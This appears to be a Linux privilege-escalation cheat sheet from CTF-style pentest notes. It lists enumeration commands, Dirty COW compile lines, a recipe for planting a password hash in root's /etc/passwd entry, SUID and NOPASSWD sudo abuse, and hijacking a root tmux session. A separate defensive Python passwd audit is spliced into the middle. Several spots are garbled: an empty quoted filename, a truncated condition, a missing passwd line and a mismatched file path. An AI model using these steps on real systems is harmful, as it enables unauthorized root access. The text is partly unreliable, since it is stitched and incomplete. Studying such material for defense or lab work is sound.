Linux Post Exploitation

Steps to follow after an initial foothold is found on a Linux OS.


uname -a
cat /etc/passwd
sudo -l

32bit or 64bit?
file /sbin/init
uname -a (x86_64 = 64bit) (i386 or i686 = 32bit)

Look in the home directory of the user ("ls -lAR"). Do you find "​"?
If so, it may be vulnerable to "Exploit-DB 14339".

Run Scripts


Privesc check (Pentest Monkey)

Kernel Exploits

What is the version of the kernel? (uname -a)

2.6.x -> 3.9: try Dirty COW first (searchsploit 2.6 cow) (try 40616.c first)
compile locally (don't try to use -m32 on a 64-bit box for this exploit)
32bit - gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt

2.6.x --> then "searchsploit 2.6.x"

What files are world writable?
If /etc/passwd is...

Then generate a password hash and place it in the root user's passwd entry.

openssl passwd sp00ks

So now we copy dhaczA9zC7C5k to the root user's passwd line like so...


and now we can do
# su

root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)
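From the defender's side, the technique above leaves two footprints in /etc/passwd: a password hash sitting in the second field instead of the "x" shadow marker, and possibly an extra uid-0 account. The audit below is an added example, not part of the original post; the sample passwd content (the "backdoor" account included) is constructed here, and `passwd_mode_findings` takes an `st_mode` so it can be checked offline.

```python
import os
import stat
from typing import List

# Constructed sample /etc/passwd body (not from a real host). The root line
# carries the inline DES hash from the walkthrough above instead of "x", and
# "backdoor" is a second uid-0 account.
SAMPLE_PASSWD = """\
root:dhaczA9zC7C5k:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor:x:0:0::/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
scriptmanager:x:1001:1001::/home/scriptmanager:/bin/bash
"""

# Password fields that legitimately appear in /etc/passwd on a shadowed system.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> List[str]:
    """Return findings for an /etc/passwd body: inline hashes, empty password
    fields, uid-0 accounts other than root, and malformed entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"line {lineno}: {name} has an empty password field")
        elif pw not in SHADOWED:
            findings.append(f"line {lineno}: {name} has an inline password hash")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: {name} is a uid-0 account")
    return findings


def passwd_mode_findings(mode: int) -> List[str]:
    """Flag an /etc/passwd st_mode that lets non-root users write it (expected 0644)."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("/etc/passwd is world-writable")
    if mode & stat.S_IWGRP:
        findings.append("/etc/passwd is group-writable")
    return findings


if __name__ == "__main__":
    print("\n".join(audit_passwd(SAMPLE_PASSWD)))
    print(passwd_mode_findings(os.stat("/etc/passwd").st_mode) or ["mode ok"])
```

Run against the live file with `audit_passwd(open("/etc/passwd").read())` to use it as a host check.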

Check SUID

SUID - at least one should work if not all of them.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Example Vulnerable file

-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency

We see the "s" (setuid bit) is set and that it is executable by everyone!

So now run it "./var/htb/emergency"
and you should have root

Running sudo commands without a password

User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL

In this example, as this is a user and not a file, we can execute commands as user "scriptmanager"
without specifying a password.

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$


What services are listening on localhost or


Process List (ps -aux)

Tmux session running as root?

:~$ ps -aux | grep tmux
Warning: bad ps syntax, perhaps a bogus '-'? See
root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess

Connect to it - "tmux -S /.devs/dev_sess"

